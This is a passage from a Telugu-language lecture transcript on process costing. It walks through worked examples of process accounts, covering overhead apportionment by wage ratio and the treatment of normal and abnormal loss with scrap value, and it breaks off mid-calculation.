ఇలా ఒక్కొక్క అంశాన్ని ప్రాసెస్ ఖాతాలో డెబిట్ వైపు రాయవలసి ఉంటుంది. అదే క్రెడిట్ వైపు ఏవైనా సాధారణ నష్టం ఏర్పడినా, అసాధారణ నష్టం ఏర్పడినా ఈ తదుపరి ప్రాసెస్కి మొత్తం ఉత్పత్తి వ్యయాన్ని బదిలీ చేసేటప్పుడు క్రెడిట్ వైపు రాయడం జరుగుతుంది. మరొకసారి జాగ్రత్తగా వినండి. ప్రాసెస్ ఖాతాను తయారు చేసేటప్పుడు ప్రాసెస్ ఖాతా నమూనా ఏ విధంగా ఉంటుంది అంటే, ప్రాసెస్ ఖాతాలో డెబిట్ వైపు వేయవలసినటువంటి అంశాలు ముందుగా ఆ ప్రాసెస్లో ప్రవేశపెట్టినటువంటి మెటీరియల్స్, ఆ ప్రాసెస్ సంబంధించినటువంటి ప్రత్యక్ష వేతనాలు, ఆ ప్రాసెస్ సంబంధించినటువంటి పరోక్ష ఖర్చులు డెబిట్లో వేయవలసినటువంటి అవసరం ఉంటుంది. క్రెడిట్కి వచ్చేటప్పటికి ఆ ప్రాసెస్లో సంబంధించినటువంటి సాధారణ నష్టం, అదే ప్రాసెస్లో సంబంధించినటువంటి అసాధారణ నష్టం, ఇంకా తదుపరి మొత్తం ఉత్పత్తి వ్యయాన్ని తదుపరి ప్రాసెస్కి బదిలీ చేయడం అనేది ఉంటుంది. ఇక్కడ మీకు నమూనా పూర్తిగా అర్థమైతే లెక్కని ఇమీడియట్గా చేసేటటువంటి అవకాశం ఉంటుంది. ఒకసారి లెక్క చెప్తున్నాను. ఈ లెక్క ఒకసారి జాగ్రత్తగా చూసినట్లయితే, ఇక్కడ వస్తు తయారీకి 3 ప్రాసెస్లు ఉన్నాయని చెప్పారు. ఇక్కడ ఉమ్మడిగా అయినటువంటి ఖర్చులు 8,500 రూపాయలు ఉన్నాయని చెప్పారు. ఈ 8,500ని ప్రతి ఒక్క ప్రాసెస్లో ఉండేటటువంటి వేతనాల నిష్పత్తులు పంచమని చెప్పారు. ఇంకా మిగతా వివరాలు ఈ విధంగా ఇవ్వడం జరిగింది. ఇక్కడ వివరాలు కానీ మీరు కానీ అబ్జర్వ్ చేసినట్లయితే ప్రాసెస్ 1, ప్రాసెస్ 2, ప్రాసెస్ 3 ఇచ్చినటువంటి వివరాలు చూడండి. మెటీరియల్స్, వేతనాలు, ప్రత్యక్ష ఖర్చులు. మెటీరియల్స్ ప్రాసెస్ 1లో 15,000, వేతనాలు 8,000, ప్రత్యక్ష ఖర్చులు ప్రాసెస్ 1లో 2,600 ఇవ్వడం జరిగింది. అదేవిధంగా ప్రాసెస్ 2లో మెటీరియల్స్ 5,000, వేతనాలు 20,000, ప్రత్యక్ష ఖర్చులు 7,200 ఇవ్వడం జరిగింది. ప్రాసెస్ 3లో 2,000 మెటీరియల్స్, 6,000 వేతనాలు, ప్రత్యక్ష ఖర్చులు 2,500 ఇవ్వడం జరిగింది. ఈ లెక్కని మన ప్రాసెస్ ఖాతాలో ఏ విధంగా చూపించాలి, ఏ విధంగా ఉత్పత్తి వ్యయాన్ని మనం లెక్కించాలి అన్నది చూద్దాం. ముందుగా ప్రాసెస్ 1. ప్రాసెస్ 1 పూర్తయిన తర్వాత మాత్రమే ప్రాసెస్ 2కి వెళ్ళాలి. ప్రాసెస్ 2 పూర్తయిన తర్వాత ప్రాసెస్ 3కి వెళ్ళాలి. మనం ప్రాథమిక అంశాల్లో చెప్పుకున్నాం, ప్రాసెస్ కాస్టింగ్ అనేది ఒక అవిచ్ఛిన్న ప్రక్రియ. ఎందుకంటే ప్రాసెస్ 1 పూర్తయిన తర్వాత ప్రాసెస్ 1లో తయారైన వస్తువు ప్రాసెస్ 2కి బదిలీ చేయడం జరుగుతుంది. ప్రాసెస్ 2లో తయారైన వస్తువు ప్రాసెస్ 3కి బదిలీ చేయడం జరుగుతుంది. ప్రాసెస్ 3లో పూర్తయినటువంటి వస్తువుల్ని పూర్తిగా తయారైన వస్తువులకి బదిలీ చేయడం జరుగుతుంది. ఇప్పుడు ఈ లెక్కను ఏ విధంగా చేయాలో ఒక్కసారి చూడండి. ప్రాసెస్ ఖాతా 1 నేను చెప్పినట్టుగా నమూనా మీరు కానీ గుర్తుంచుకున్నట్లయితే, ప్రాసెస్ ఖాతాలో డెబిట్ వైపు ముందుగా మనం వేయవలసినటువంటి అంశం మెటీరియల్స్. ఇక్కడ ప్రాసెస్ 1కి సంబంధించిన మెటీరియల్స్ ఎంత ఇచ్చారు? 15,000 ఇవ్వడం జరిగింది. అలాగే వేతనాలు ఎంత ఇచ్చారు? 8,000 ఇవ్వడం జరిగింది. ప్రత్యక్ష ఖర్చులు 2,600 ఇవ్వడం జరిగింది. ఇవి ప్రాసెస్ ఖాతాలో ముందుగా డెబిట్ వైపు రాయాలి. మెటీరియల్స్ 15,000 డెబిట్ చేసాం, 2 మెటీరియల్స్. అలాగే వేతనాలు డెబిట్ చేసాం 8,000, ప్రత్యక్ష ఖర్చులు డెబిట్ చేసాం 2,600. మీకు లెక్క చెప్పినప్పుడు ప్రారంభంలోనే చెప్పాను, ప్రత్యక్ష ఖర్చులు అయిపోయిన తర్వాత ఒక ఉమ్మడి పరోక్ష ఖర్చులు ఉన్నాయి 8,500. ఈ ఉమ్మడి పరోక్ష ఖర్చుల్ని మీరు ఏ విధంగా పంచాలి అనేది ప్రాతిపదిక ఇవ్వడం జరిగింది. ప్రత్యక్ష వేతనాల ప్రాతిపదికలో పంచాలి అని చెప్పడం జరిగింది. ఇక్కడ కానీ మీరు ప్రత్యక్ష వేతనాలు కానీ చూసినట్లయితే ప్రశ్నలో
ప్రాసెస్ 1కి 8,000, అలాగే ప్రాసెస్ 2కి 20,000, ప్రాసెస్ 3కి 6,000 ఇవ్వడం జరిగింది. ఈ వేతనాలకు కానీ మనం కానీ నిష్పత్తి కానీ కట్టినట్లయితే నిష్పత్తి ఏ విధంగా వస్తుంది అంటే 4:10:3గా రావడం జరుగుతుంది. ఈ నిష్పత్తి ప్రకారం ప్రాసెస్ 1కి 8,500 ఉమ్మడి పరోక్ష ఖర్చులను పంపిణీ చేసినట్లయితే 4/17 చేస్తే మనకు వచ్చేటటువంటి ఖర్చులు ప్రాసెస్ 1కి డెబిట్ చేయవలసినవి 2,000 రూపాయలు. సో ఈ మొత్తం ఖర్చులు డెబిట్ టోటల్ చేస్తే 27,600 రూపాయలు వచ్చింది. ఈ 27,600ని తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. కాబట్టి తదుపరి ప్రాసెస్ బదిలీ చేయాలంటే ప్రాసెస్ 1లో క్రెడిట్ చేయాలి బై ప్రాసెస్ 2 ఖాతా అని చెప్పి 27,600. ఈ ప్రశ్నలో ప్రాథమిక ప్రశ్న కాబట్టి మీకు సాధారణ నష్టం కానీ అసాధారణ నష్టం కానీ ఏమీ ఇవ్వలేదు. సాధారణ పరిస్థితుల్లో ఈ విధంగా మీరు ప్రాసెస్ ఖాతాని తయారు చేయాలి. ఇదే విధంగా ప్రాసెస్ 2ని తయారు చేయాలి, ప్రాసెస్ 3ని కూడా తయారు చేయాలి. ఇప్పుడు ప్రాసెస్ 2 చూద్దాం. ప్రాసెస్ 2 తయారు చేసేటప్పుడు ముందుగా ప్రాసెస్ 1లో బదిలీ చేసింది ప్రాసెస్ 2కి బదిలీ అవుతుంది కాబట్టి ప్రాసెస్ 2లో ఫస్ట్ రాయవలసినటువంటిది ప్రాసెస్ 1 నుంచి బదిలీ అయింది రాయాలి. కాబట్టి ప్రాసెస్ 1 ఖాతా అని రాయాలి. ప్రాసెస్ 1లో వెనక్కి చూసినట్లయితే ఎంత బదిలీ చేశాము? 27,600 బదిలీ చేశాం. ఈ బదిలీ అయిన అంశము ముందుగా ప్రాసెస్ 2 ఖాతాలో డెబిట్ వైపున రాయవలసి ఉంటుంది. ఇంక తదుపరి ప్రక్రియ ఈ ప్రాసెస్ 2కి సంబంధించి ప్రశ్నలో మెటీరియల్స్ ఎంత ఇచ్చారు, వేతనాలు ఎంత ఇచ్చారు, ప్రత్యక్ష ఖర్చులు ఎంత ఇచ్చారో చూసి మెటీరియల్స్, వేతనాలు, ప్రత్యక్ష ఖర్చులు ప్రాసెస్ 2 ఖాతాలో డెబిట్ చేయవలసినటువంటి అవసరం ఉంది. మీరు ఒకసారి ప్రశ్నలు కానీ వెనక్కి కానీ చూసినట్లయితే ప్రాసెస్ 2కి సంబంధించి మెటీరియల్ 5,000, వేతనాలు 20,000, ప్రత్యక్ష ఖర్చులు 7,200 ఇవ్వడం జరిగింది. ఇవి ప్రాసెస్ 2 ఖాతాలో డెబిట్ వైపున వేతనాలు, ప్రత్యక్ష ఖర్చులు రాయడం జరిగింది. ఇక్కడ కూడా ఉమ్మడి ఖర్చుల్ని పంపిణీ చేయాలి. ఉమ్మడి ఖర్చుల్ని ఏ ప్రాతిపదిక మీద పంపిణీ చేయాలి అన్నది గతంలో మనం చూసాము. ఇక్కడ ప్రత్యక్ష వేతనాల ఆధారంగా ఉమ్మడి పరోక్ష ఖర్చుల్ని పంపిణీ చేయాలి. ఆ నిష్పత్తి కూడా ఇందాక చెప్పాను, 4:10:3 కింద ఉమ్మడి పరోక్ష ఖర్చుల్ని ఇక్కడ సర్దుబాటు చేయాలి. ఈ ప్రాసెస్ 2కి 8,500 పరోక్ష ఖర్చుల్ని 4:10:3 అంటే ప్రాసెస్ 2కి 10/17 అవుతుంది. 10/17 కానీ చేసినట్లయితే 8,500 × 10/17 5,000 రూపాయలు రావడం జరిగింది. ఎప్పుడైతే ప్రాసెస్ 2కి సంబంధించినటువంటి మొత్తం వ్యయాలు మనం రికార్డ్ చేసేసామో ఆ మొత్తం వ్యయాల్ని తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. ఇక్కడ ప్రాసెస్ 2 కాబట్టి తదుపరి ప్రాసెస్ మనకి ప్రాసెస్ 3 అవుతుంది. కాబట్టి ఇక్కడ ప్రాసెస్ 3 ఖాతాకు బదిలీ చేశాము. మొత్తం ఉత్పత్తి వ్యయము 64,800 రూపాయలు. ఇప్పుడు ఇదే పద్ధతిలో ప్రాసెస్ 3 ఖాతా కూడా మనం తయారు చేయాలి. ప్రాసెస్ 3 ఖాతా చూస్తే మనకి ప్రాసెస్ 3 ఖాతాకి ప్రాసెస్ 2 ఖాతా నుండి బదిలీ అయినటువంటి అంశం మనకుంది. ప్రాసెస్ 2 నుండి బదిలీ అయినటువంటి మొత్తం 64,800 రూపాయలు ముందుగా ప్రాసెస్ 3 ఖాతాలో చూపించవలసినటువంటి అవసరం ఉంది. ఇక తదుపరి ముందుగా మనం చెప్పుకున్నట్లుగా ఈ ప్రాసెస్ సంబంధించినటువంటి మెటీరియల్స్, ఈ ప్రాసెస్ సంబంధించినటువంటి వేతనాలు, అలాగే ప్రత్యక్ష ఖర్చులు ప్రాసెస్ ఖాతాకి డెబిట్ చేయాలి. ఇక్కడ కూడా ఉమ్మడి ఖర్చుల్ని ఇచ్చినటువంటి ప్రత్యక్ష వేతనాల ప్రాతిపదిక ఆధారంగా లెక్కించి ప్రాసెస్ 3 ఖాతాలో డెబిట్ చేయవలసినటువంటి అవసరం ఉంది. ఒకసారి గమనించండి, ఉమ్మడి ఖర్చులు ఏమో 8,500, నిష్పత్తి 4:10:3 అంటే ప్రాసెస్ 1కి 4/17, ప్రాసెస్ 2కి 10/17. ఇప్పుడు ప్రాసెస్ 3కి 3/17 వంతున మనం పంచాలి. 8,500ను 3/17 వంతుని కానీ మనం పంచితే మనకి 1,500 వస్తుంది. ఇక్కడ ప్రాసెస్ 3లో మొత్తం వ్యయము 76,800. ఇక్కడ లెక్క చెప్పినప్పుడు ప్రారంభంలో చెప్పడం జరిగింది, ఒక వస్తువు 3 ప్రాసెస్ల ద్వారా మాత్రమే తయారవుతుంది అంటే 3 ప్రాసెస్లలో పూర్తయిపోతుంది. కాబట్టి 3వ ప్రాసెస్లో ఈ మొత్తం వ్యయాన్ని పూర్తయిన సరుకు ఖాతాకి బదిలీ చేయవలసినటువంటి అవసరం ఉంది. ఇక్కడ మొత్తం ఉత్పత్తి వ్యయాన్ని క్రెడిట్ వైపున పూర్తయిన సరుకు ఖాతాకి బదిలీ చేసాం 76,800 రూపాయలు. ఇది ప్రాసెస్ 1, ప్రాసెస్ 2, ప్రాసెస్ 3 ఖాతాలు తయారు చేసేటటువంటి విధానం. సింపుల్ ప్రాబ్లం, జాగ్రత్తగా చూడండి. ఒక్కసారి మళ్ళీ పునశ్చరణ చేద్దాం, రిపీట్ చేద్దాం. ఇక్కడ
మనకి ఇచ్చినటువంటి ప్రశ్నలో ఎన్ని ప్రాసెస్లు ఇచ్చాడో 3 ప్రాసెస్ల్లో ఒక వస్తువు తయారవుతుందని చెప్పారు. ఉమ్మడి ఖర్చులు ఇచ్చారు 8,500. ఈ ఉమ్మడి ఖర్చుల్ని పరోక్ష ఖర్చుల కింద చెప్పాడు. ఇక్కడ ఆ పరోక్ష ఉమ్మడి ఖర్చుల్ని వేతనాల నిష్పత్తిలో పంచమని చెప్పారు. అలాగే 3 ప్రాసెస్లకు సంబంధించినటువంటి సమాచారం ఇవ్వడం జరిగింది. ప్రాసెస్ ఖాతాలు తయారు చేసేటప్పుడు ప్రాసెస్ ఖాతా యొక్క నమూనా మనకు కానీ అవగాహన ఉన్నట్లయితే ప్రాసెస్ ఖాతాలు చేయడం చాలా ఈజీ. ప్రాసెస్ ఖాతాలు ఏ విధంగా తయారు చేస్తారు? ప్రాసెస్ ఖాతాకి డెబిట్ క్రెడిట్ నార్మల్ ఖాతాలాగే ఉంటాయి. ప్రాసెస్ ఖాతాలో డెబిట్ సైడ్ ముందుగా మనం ప్రవేశపెట్టినటువంటి మెటీరియల్స్ ఏమైనా ఉంటే అది డెబిట్ చేయాలి. అలాగే ఆ ప్రాసెస్ సంబంధించిన వేతనాలు ఉంటే డెబిట్ చేయాలి. ప్రత్యక్ష ఖర్చులు డెబిట్ చేయాలి. పరోక్ష ఖర్చులు డెబిట్ చేయాలి. ఇక్కడ మనం డెబిట్ చేసినటువంటి అంశాలన్నీ కూడా ఉత్పత్తి వ్యయాన్ని ప్రభావితం చేసేటటువంటి అంశాలు ఉంటాయి. అలాగే క్రెడిట్ వైపు ఏమైనా సాధారణ నష్టం ఉంటే క్రెడిట్ చేయాలి, అసాధారణ నష్టం ఉంటే క్రెడిట్ చేయాలి. మిగిలినటువంటి మొత్తం ఏదైతే ఉందో ఉత్పత్తి వ్యయము తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. ఈ ప్రక్రియ కానీ మీరు కానీ అవగాహన చేసుకున్నట్లయితే మిగతా లెక్కలు వివిధ సర్దుబాట్లతో చేయడం చాలా సులభంగా ఉంటుంది. ఇక్కడ మనం సింపుల్ ప్రాబ్లం ఒకటి చూసాం. సాధారణ అసాధారణ నష్టాలతో మనం ఒకవేళ లెక్క కానీ ఉన్నట్లయితే ఏ విధంగా చేయాలి చూద్దాం ఈరోజు సెషన్లో. ఇక్కడ రెండవ ప్రశ్న ఒకసారి అందరూ జాగ్రత్తగా అబ్జర్వ్ చేయండి. మొదటి ప్రశ్నకి రెండో ప్రశ్నకి ఉండేటటువంటి తేడా కూడా మీరు గమనించవచ్చు. మొదటి ప్రశ్నలో సాధారణ అంశాలు మాత్రమే ఇచ్చాను. రెండవ ప్రశ్నలో ఒకవేళ ప్రాసెస్లో ఏదైనా సాధారణ నష్టం కానీ అసాధారణ నష్టం కానీ ఏర్పడితే అవి ఏ విధంగా మనం చూపించాలి, ఏ విధంగా ప్రాసెస్ ఖాతాల్లో చూపించవలసినటువంటి అవసరం ఉంది అనేది ఈ లెక్కలో క్లియర్గా ఇవ్వడం జరిగింది. ఒకసారి లెక్క చూసినట్లయితే ఈ క్రిందిచ్చిన వివరాల నుండి అవసరమైన ఖాతాలను తయారు చేయండి. ఈ లెక్కలో కూడా ప్రారంభ నిల్వలు కానీ ముగింపు నిల్వలు కానీ తయారీలను వస్తువులు కానీ ఇవ్వలేదు. సో ఏ ప్రాసెస్లో లేవు. ప్రాసెస్ బి యొక్క దిగుబడి 16,700 యూనిట్లు అని చెప్పడం జరిగింది. ఇక్కడ వివరాలు ఒకసారి చూడండి. ప్రాసెస్ ఏ, ప్రాసెస్ బి. ప్రవేశపెట్టిన మెటీరియల్స్ ప్రాసెస్ ఏలో 30,000, ప్రాసెస్ బిలో 3,000. అలాగే శ్రమ ప్రాసెస్ ఏలో 10,000, ప్రాసెస్ బిలో 12,000. ఓవర్ హెడ్స్ అంటే పరోక్ష ఖర్చులు ప్రాసెస్ ఏలో 7,000, ప్రాసెస్ బిలో 8,600. ఇక్కడ ప్రవేశపెట్టినటువంటి యూనిట్లు ప్రాసెస్ ఏలో 20,000 యూనిట్లు, ప్రాసెస్ బిలో 17,500 యూనిట్లు. ఇక్కడ సాధారణ నష్టం 10% ప్రాసెస్ ఏలో, 4% ప్రాసెస్ బిలో చెప్పడం జరిగింది. సాధారణ నష్టం కూడా కొన్ని ప్రత్యేక సందర్భాల్లో రద్దు విలువకి అమ్మడం జరుగుతూ ఉంటుంది. యూనిట్ ఒకటికి ₹1 ప్రాసెస్ ఏలో రద్దు విలువని అమ్మారు. అలాగే ప్రాసెస్ బిలో యూనిట్ యొక్క రద్దు విలువ ₹2 అమ్మడం జరిగింది. ఈ లెక్కని ప్రాసెస్ ఖాతాల్లో ఏ విధంగా చూపాలి? ఇందాక లెక్కకి ఈ లెక్కకి ఉన్నటువంటి ప్రధానమైన వ్యత్యాసం ఒకటే. ఇక్కడ సాధారణ నష్టం ఏర్పడింది, అసాధారణ నష్టం కూడా ఏర్పడింది. మొట్టమొదటి లెక్కలో యూనిట్ల సంఖ్య అవి ఇవ్వలేదు. ఇక్కడ రెండవ లెక్కలో యూనిట్ల సంఖ్య కూడా ఇవ్వడం జరిగింది. ముందుగా మనం ఇక్కడ ప్రాసెస్ ఏ ఖాతాని తయారు చేయాలి. ప్రాసెస్ ఏ ఖాతా తయారు చేయాలి అంటే మీకు ఆల్రెడీ నమూనా చెప్పాను. ప్రాసెస్ ఏ ఖాతాలో ఏముంటాయి? డెబిట్ వైపు ప్రవేశపెట్టినటువంటి మెటీరియల్స్ ముందుగా రాయాలి. తదుపరి వేతనాలు, ప్రత్యక్ష ఖర్చులు, అలాగే పరోక్ష ఖర్చులు, ఉమ్మడి ఖర్చులు ఇవన్నీ కూడా డెబిట్లో రాయడం జరుగుతుంది. క్రెడిట్ వైపున సాధారణ నష్టం, అసాధారణ నష్టం వేయాలి. మొదటి యూనిట్లో మొదటి ప్రాసెస్లో వచ్చేటటువంటి ఉత్పత్తి వ్యయాన్ని తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. చివరి ప్రాసెస్లో వచ్చినటువంటి ఉత్పత్తి వ్యయాన్ని పూర్తయినటువంటి సరుకు ఖాతాకి బదిలీ చేయవలసినటువంటి అవసరం ఉంటుంది. ముందు లెక్కలో ఖాతా వేసినప్పుడు యూనిట్లు వరుస పెట్టడం మనం అవసరం లేకపోయింది. కానీ ఇక్కడ యూనిట్ల విలువ ఇచ్చారు కాబట్టి యూనిట్ల కాలం కూడా మొత్తం కాలంతో మనం మెయింటైన్ చేయవలసినటువంటి అవసరం ఉంది. ఇక్కడ ప్రాసెస్ ఏ ఖాతా ఒకసారి కానీ మీరు చూసినట్లయితే ఏ విధంగా తయారు చేయాలి? ముందుగా ప్రవేశపెట్టినటువంటి మెటీరియల్. ప్రాసెస్ ఏలో మెటీరియల్ ఎన్ని ప్రవేశపెట్టామో ఆల్రెడీ ప్రశ్నలో ఇవ్వడం జరిగింది. 20,000 యూనిట్లు ప్రవేశపెట్టారు. 20,000 యూనిట్లు ప్రవేశపెట్టినటువంటి యూనిట్లు ఇక్కడ మీరు మొత్తం విలువ యూనిట్లు 20,000 యూనిట్లు ప్రవేశపెట్టడం జరిగింది. ఇక్కడ విలువ 20,000 యూనిట్లు ఎంత వ్యయము అంటే మెటీరియల్స్ వ్యయం మీకు ఇవ్వడం జరిగింది. మెటీరియల్స్ 30,000 అని చెప్పారు. ఆ 30,000 మొత్తం మెటీరియల్ వ్యయము. కానీ ఎన్ని యూనిట్లు వ్యయం? అది 20,000 యూనిట్లు.
అంటే ప్రవేశపెట్టిన యూనిట్లు ఏమో 20,000, ఆ 20,000 యూనిట్లు ప్రవేశపెట్టడానికి అయినటువంటి మెటీరియల్ ఖర్చు ఏమో 30,000. కాబట్టి ఈ ప్రాసెస్ ఏ ఖాతాలో యూనిట్ల కాలంలో ప్రవేశపెట్టిన యూనిట్లు 20,000 మొత్తంలో 30,000 అని చెప్పి రాయడం జరిగింది. అలాగే ప్రాసెస్ ఏకి సంబంధించిన శ్రమ ఎంత ఉంది చూడండి, విలువ 10,000, ఓవర్ హెడ్స్ విలువ ఎంత ఉంది అంటే 7,000 ఉంది. కాబట్టి ప్రాసెస్ ఏలో ముందుగా డెబిట్ వైపున శ్రమ 10,000 రాయాలి, ఓవర్ హెడ్స్ వాడిచ్చినటువంటి విలువ మనం రాయవలసినటువంటి అవసరం ఉంది. సో ఓవర్ హెడ్స్ 70,000 రూపాయలు. అంటే ప్రాసెస్ ఏ ఖాతాలో డెబిట్ వైపున 20,000 యూనిట్లు మనం ప్రవేశపెట్టాము, మెటీరియల్స్ ఖర్చులు, శ్రమ ఖర్చులు, ఓవర్ హెడ్స్ ఖర్చులు వేసాం. ఈ ప్రాసెస్లో లెక్కలో ఏం చెప్పాడు అంటే సాధారణ తరుగుదల 10% ఉంది అని చెప్పాడు. సాధారణ తరుగుదల అంటే సాధారణ నష్టం కింద భావించాలి. 10% దేని మీద 10%? ప్రవేశపెట్టినటువంటి యూనిట్ల మీద 10%. ఇక్కడ ప్రవేశపెట్టినటువంటి యూనిట్లు ఎన్ని ఉన్నాయి? 20,000 యూనిట్లు ఉన్నాయి. కాబట్టి 20,000 యూనిట్ల మీద 10% సాధారణ వృధాగా భావించాలి. సో క్రెడిట్ వైపు సాధారణ వృధా వేసినట్లయితే 20,000 యూనిట్లలో 10% లెక్క కడితే 2,000 యూనిట్లు రావడం జరిగింది. సాధారణ పరిస్థితుల్లో యూనిట్లు మాత్రమే వేయాలి, కానీ ఈ లెక్కలో ఈ రద్దు విలువగా సాధారణ నష్టం అమ్మకం జరుగుతుంది అని చెప్పి ఇవ్వడం జరిగింది. కాబట్టి రద్దు విలువ యూనిట్ ఒకటికి ₹1 అని చెప్పారు. కాబట్టి 2,000 యూనిట్ల సాధారణ నష్టం యొక్క రద్దు విలువగా అమ్మకం చేసింది 2,000గా భావించి అది మొత్తంలో మీకు చూపించాలి. ఇక్కడ అసాధారణ నష్టం ఎలా లెక్క కట్టాలి? ఈ ప్రశ్నలో అసాధారణ నష్టం గురించి చెప్పలేదు. చెప్పకపోయినా ఏ విధంగా లెక్క కట్టాలి అంటే ముందు ఎన్ని యూనిట్లు ప్రవేశపెట్టామో మనం చూడండి. 20,000 యూనిట్లు ప్రవేశపెడితే 20,000 యూనిట్లో సాధారణ నష్టం ఎంత ఏర్పడింది? 2,000 యూనిట్లు సాధారణ నష్టం ఏర్పడింది. అంటే 20,000 యూనిట్లో 2,000 యూనిట్లు నష్టపోతే ఇంకా 18,000 యూనిట్లు ఉండాలి. కానీ ప్రశ్నలో ఏం చెప్తున్నారు అంటే ప్రాసెస్ బిలోకి వెళ్ళిన యూనిట్లు, ప్రవేశపెట్టిన యూనిట్లు 17,500 అని చెప్పారు. అంటే 18,000 యూనిట్లు వెళ్ళవలసింది 17,500 యూనిట్లు మాత్రమే ప్రాసెస్ బికి వెళ్ళింది. అంటే ఇక్కడ అర్థం చేసుకోవాల్సిన అంశం ఏంటంటే అసాధారణ నష్టం 500 యూనిట్లు జరిగిందిగా మనం భావించాలి. సో ఇక్కడ అసాధారణ నష్టం 500 యూనిట్లుగా భావించాలి. అసాధారణ నష్టం విలువ ఏ విధంగా లెక్క కట్టాలి మీకు వర్కింగ్ నోట్స్లో చూపిస్తాను. ఇక్కడ ఒకసారి జాగ్రత్తగా చూడండి. వర్కింగ్ నోట్స్ 20,000 యూనిట్ల మెటీరియల్స్, శ్రమ, ఓవర్ హెడ్స్ మొత్తం ఖర్చులు మీరు కానీ చూసినట్లయితే 30,000 మెటీరియల్, 10,000 రూపాయలు శ్రమ, ఓవర్ హెడ్స్ 7,000, మొత్తం వ్యయము 47,000 అయింది. అంటే 20,000 యూనిట్లకి మొత్తం వ్యయం 47,000 అయింది. ఈ 20,000 యూనిట్లలో 2,000 యూనిట్ల సాధారణ నష్టం పోయింది. దాని విలువ 2,000. అంటే 18,000 యూనిట్లు వాల్యూ ఎంత అంటే 45,000. సో 18,000 యూనిట్ల విలువ 45,000 అయితే ఒక్కొక్క యూనిట్ విలువ ఎంత అవుతుంది? ఒక్కొక్క యూనిట్ వ్యయం ఇక్కడ మీరు అబ్జర్వ్ చేస్తే 45,000 బై 18,000 2.5 అంటే ₹2.50 వస్తుంది ఒక్కొక్క యూనిట్ వ్యయము. ఇక్కడ మనకి అసాధారణ నష్టం ఎన్ని యూనిట్లుగా మనం భావించాం? 500 యూనిట్లు. కాబట్టి 500 యూనిట్లకి ₹2.50 చొప్పున లెక్క పెడితే మీకు ₹1,250 రావడం జరిగింది. ఇక్కడ అసాధారణ నష్టం 500 యూనిట్లు ₹1,250 వేయడం జరిగింది. ఇంకా నిల్వ తేల్చాలి. యూనిట్లు ఏమో 20,000, అదే యూనిట్లు డెబిట్ వైపు ఉన్నవి క్రెడిట్ వైపు తీసుకొస్తే యూనిట్లు 20,000. ఆ 20,000 యూనిట్లలోంచి సాధారణ వృధా 2,000 యూనిట్లు తీసేస్తాం, అసాధారణ వృధా 500 యూనిట్లు తీసేస్తాం. ఇంకా మిగిలింది ప్రాసెస్ బికి బదిలీ 17,500. మొత్తం ఎలా వస్తుందంటే మిగిలి మొత్తం బ్యాలెన్స్ ఏదైతే ఉందో 47,000లోంచి 2,000 1,250 తీసేస్తే మిగిలింది 43,750. అది తదుపరి ప్రాసెస్కి బదిలీ అవుతుంది. విద్యార్థులారా, ఇక్కడ మనం సాధారణ నష్టం ఉంది, అసాధారణ నష్టం ఉంది. ఇక్కడ సాధారణ నష్టానికి కూడా రద్దు విలువ ఇవ్వడం జరిగింది. కాబట్టి ఆ రద్దు విలువని మొత్తంలో వేయడం జరిగింది. సాధారణ పరిస్థితుల్లో రద్దు విలువ ఇవ్వకపోతే సాధారణ నష్టం యూనిట్లలో మాత్రమే చూపించాలి, మొత్తం విలువలో చూపించాల్సినటువంటి అవసరం ఉండదు. ఇక ప్రాసెస్ బి చూడండి. ప్రాసెస్ బి గారిని చూసినట్లయితే ఇందాకే చెప్పాను, ప్రాసెస్ ఏలో ఏదైతే బదిలీ అయిందో ముందుగా అదే మొత్తం ప్రాసెస్ బికి బదిలీ అవుతుంది. కాబట్టి ముందుగా మనం ఇక్కడ వేసింది ఏంటంటే ప్రాసెస్ ఏ నుండి బదిలీ అనేటువంటి మొత్తం 17,500 యూనిట్లు మొత్తం వ్యయము ప్రాసెస్ బికి బదిలీ చేయాలి. 17,500 మొత్తం 43,750 డెబిట్లో వేయాలి. అదేవిధంగా మెటీరియల్స్, శ్రమ,
ఓవర్ హెడ్స్ ప్రాసెస్ బికి సంబంధించినటువంటి ముందుగా వేయాలి. ప్రాసెస్ బికి సంబంధించినటువంటి మెటీరియల్స్ విలువ ఆల్రెడీ ప్రశ్నలో ఇవ్వడం జరిగింది 3,000 రూపాయలు, శ్రమ విలువ ఇవ్వడం జరిగింది 12,000 రూపాయలు, ఓవర్ హెడ్స్ విలువ 8,600 ప్రశ్నలో ఇచ్చిన ప్రాసెస్ బికి సంబంధించినటువంటి ఈ ప్రాసెస్ బి ఖాతాలో డెబిట్ వైపున వేయవలసినటువంటి అవసరం ఉంది. ఇక్కడ ప్రాసెస్ బిలో ప్రవేశపెట్టిన యూనిట్లు 17,500. సాధారణ వృధా ఇక్కడ మనకి లెక్కలో చెప్పడం జరిగింది ప్రాసెస్ బిలో 4% అని. కాబట్టి 17,500 యూనిట్లు ప్రవేశపెట్టిన యూనిట్లలో 4% కానీ లెక్కగడితే 4% లెక్కగడితే 700 యూనిట్లు వచ్చింది. ఈ 700 యూనిట్లు రద్దు విలువకి ఒక్కొక్క యూనిట్ 2 రూపాయలకు అమ్మడం జరిగింది అని ప్రశ్నలో చెప్పడం జరిగింది. కాబట్టి 700 యూనిట్లు మనకి 2 రూపాయల రద్దు విలువ కింద లెక్కగట్టి క్రెడిట్ చేయడం జరిగింది 1,400 రూపాయల కింద. సో ఇక్కడ మీరు అసాధారణ నష్టం ఏ విధంగా ఐడెంటిఫై చేయాలి చూడండి. ప్రవేశపెట్టిన యూనిట్లు 17,500 యూనిట్లు, సాధారణ నష్టమేమో 700 యూనిట్లు. 17,500 యూనిట్ల నుంచి 700 యూనిట్లు సాధారణ నష్టంగానే తీసినట్లయితే మిగిలిన మొత్తంలో పూర్తయిన సరుకు ఖాతాకి ఎంత బదిలీ చేశాము అన్నది ప్రశ్నలో క్లియర్గా చెప్పడం జరిగింది. 16,700 యూనిట్లు ప్రాసెస్ బి నుండి దిగుబడి వచ్చింది అని చెప్పారు. అంటే పూర్తిగా తయారైనవి 16,700 యూనిట్లు మాత్రమే. కాబట్టి మిగిలిన బ్యాలెన్సు 100 యూనిట్లు, 16,800 యూనిట్లు ఉండాలి. ఎందుకంటే 17,500 యూనిట్లు ప్రవేశపెడితే 700 యూనిట్లు సాధారణ వృధా అయితే 16,800 యూనిట్లు ఉండాలి. 16,800 యూనిట్లకి దిగుబడి 16,700 యూనిట్లే చెప్పారు. కాబట్టి ఆ 100 యూనిట్లు మనకి నష్టంగా, 